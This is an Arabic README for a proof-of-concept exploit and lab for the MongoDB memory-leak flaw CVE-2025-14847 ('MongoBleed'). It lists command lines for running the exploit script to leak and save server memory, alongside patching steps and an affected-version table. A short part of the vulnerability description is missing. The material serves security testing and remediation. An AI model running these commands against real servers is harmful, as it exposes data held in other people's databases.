
CVE-2025-14847 MongoBleed - ثغرة تسرّب الذاكرة في MongoDB PoC
👨💻 المؤلف: Furkan KAYAPINAR (@FurkanKAYAPINAR)
⚠️ للأغراض التعليمية فقط
بيئة مختبر وسكربت استغلال لثغرة تسريب الذاكرة الحرجة التي لا تتطلب مصادقة في خادم MongoDB.
CVE-2025-14847 (MongoBleed) هي ثغرة حرجة لتسريب الذاكرة لا تتطلب مصادقة في معالجة ضغط zlib داخل خادم MongoDB.
توجد الثغرة في message_compressor_zlib.cpp. عند معالجة رسائل OP_COMPRESSED:
uncompressedSizeقد تتضمن البيانات المسربة:
# Clone repository
git clone https://github.com/FurkanKAYAPINAR/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Create virtual environment
python3 -m venv venv
source venv/bin/activate # Linux/macOS
# venv\Scripts\activate # Windows
# Install dependencies
pip install -r requirements.txt
شغّل نسخة MongoDB قابلة للاستغلال للاختبار:
cd lab
# Start vulnerable MongoDB (6.0.26 with zlib enabled)
docker-compose up -d
# Verify it's running
docker-compose ps
# Load sample data (optional)
./setup.sh load-data
# Stop lab
docker-compose down
# Single target
python exploit/mongobleed.py -u 127.0.0.1
# With specific port
python exploit/mongobleed.py -u 127.0.0.1 -p 27017
# Save leaked data to file
python exploit/mongobleed.py -u 127.0.0.1 -o leaked_data.bin
# Multiple iterations for more data
python exploit/mongobleed.py -u 127.0.0.1 -i 20
# Quiet mode (less output)
python exploit/mongobleed.py -u 127.0.0.1 -q
# Without hex dump (text output)
python exploit/mongobleed.py -u 127.0.0.1 --text
# Update to patched version
# Example for MongoDB 6.x
sudo apt-get update
sudo apt-get install mongodb-org=6.0.27
# Start mongod without zlib
mongod --networkMessageCompressors snappy,zstd
# Or in mongod.conf
net:
compression:
compressors: snappy,zstd
python remediation/verify_fix.py --target 127.0.0.1 --port 27017
🚨 تحذير
تُوفَّر هذه الأداة لأغراض التعليم واختبارات الأمان المصرّح بها فقط.
- الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني
- أنت وحدك المسؤول عن أفعالك
- لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام
باستخدامك لهذه الأداة، فأنت تقرّ بأن لديك التفويض المناسب لاختبار الأنظمة المستهدفة.
المساهمات مرحّب بها! يُرجى قراءة CONTRIBUTING.md أولاً.
هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE.
| السمة | القيمة |
|---|
| معرّف CVE | CVE-2025-14847 |
| درجة CVSS | 8.7 (عالية) |
| متجه الهجوم | الشبكة |
| المصادقة | غير مطلوبة |
| تاريخ الإفصاح | 19 ديسمبر 2025 |
| نطاق الإصدار | الإصدار المُصحَّح |
|---|
| 8.2.0 - 8.2.2 | 8.2.3 |
| 8.0.0 - 8.0.16 | 8.0.17 |
| 7.0.0 - 7.0.26 | 7.0.28 |
| 6.0.0 - 6.0.26 | 6.0.27 |
| 5.0.0 - 5.0.31 | 5.0.32 |
| 4.4.0 - 4.4.29 | 4.4.30 |
| جميع إصدارات 4.2 و4.0 و3.6 | EOL - قم بالترقية فورًا |